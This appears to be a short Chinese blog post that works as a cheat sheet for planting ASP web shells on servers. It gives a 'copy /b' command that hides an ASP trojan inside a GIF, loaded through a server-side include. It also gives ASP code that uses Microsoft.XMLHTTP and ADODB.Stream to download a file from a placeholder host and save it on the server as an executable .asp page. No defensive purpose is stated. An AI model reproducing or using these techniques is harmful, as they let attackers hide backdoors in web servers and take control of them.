1.一句话

2.图片后门
copy *.gif /b + 网马.asp /a Google.gif
然后建个ASP文件 !–#include file=”Google.jpg”–
注意路径

3.Microsoft.XMLHTTP下载

Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://xxx/*.txt",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("Google.asp"),2
set sGet = nothing
set sPOST = nothing
response.Write("Download to succeed!
“)

保存为*.asp执行

相关文章:

  • 2022-12-23
  • 2022-01-07
  • 2022-12-23
  • 2021-09-18
  • 2021-12-21
  • 2022-12-23
  • 2022-12-23
  • 2021-09-10
猜你喜欢
  • 2022-12-23
  • 2021-09-18
  • 2022-12-23
  • 2021-06-04
  • 2021-07-16
  • 2021-11-17
相关资源
相似解决方案